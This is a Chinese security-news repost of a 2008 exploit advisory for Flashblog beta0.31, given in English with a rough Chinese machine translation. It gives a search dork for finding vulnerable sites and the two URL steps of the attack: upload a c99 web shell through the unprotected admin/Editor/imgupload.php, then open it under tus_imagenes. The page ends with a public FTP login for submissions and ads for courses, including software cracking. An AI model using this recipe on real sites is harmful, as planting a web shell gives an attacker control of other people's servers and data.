安全中国首页 > 新闻中心 > 网站程序漏洞
 

Flashblog远程文件上传漏洞

更新时间:2008-6-5 0:12:34
责任编辑:果果龙
热 点:
来自 : < mefisto_at_hackermail.com > 
日期 : 2008年5月29日6时57分21秒-0000 
( ’二元’的编码是不支持,存储为-是) flashblog beta0.31远程文件上传漏洞 

# Author : MEFISTO ---- mefisto |at |hackermail |dot| com #作者: mefisto ---- mefisto |在| hackermail |点|的COM 



# Dork : flashblog.html 


# Website : www.dumenci.net 
#网址: www.dumenci.net 


http://[Site]/[script]/admin/Editor/imgupload.php ==>>> upload your c99 shell
(http:// [网站] / [脚本] /管理/编辑/ imgupload.php ==>>>上传您的c99 Shell) 


http://[Site]/[script]/tus_imagenes/c99.php ==>>> your address
(http:// [网站] / [脚本] / tus_imagenes/c99.php ==>>>您的地址) 

 
安全中国网友投稿专用上传FTP空间:
Ftp服务器:download.anqn.com
Ftp端口:21
用户名:anqn
密 码:anqn.com
 
学习软件编程开发技术,推荐加入以下软件编程培训班:
易语言软件编程培训班(简单易学)  Delphi软件编程培训班  VC++软件编程培训班
VB软件编程培训班  JAVA高端编程就业研发班

学习网站开发制作技术,推荐加入以下网站开发培训班:
ASP.net网站开发项目实战班  ASP语言网站建设培训班

学习网络安全入侵防护技术,推荐加入以下技术培训班:
大型网络安全入侵防护班  网站脚本程序全方位安全检测班

学习网络管理、网吧运营维护技术(网管),推荐加入以下培训班:
大型网吧技术管理人才特训班  Linux网络嵌入架构工程师培训班

学习专项特殊技术,推荐加入以下专项技术培训班:
软件与游戏外挂脱壳破解班(逆向工程)  赚钱王道-网赚技能培训班  Flash动画设计师就业特训班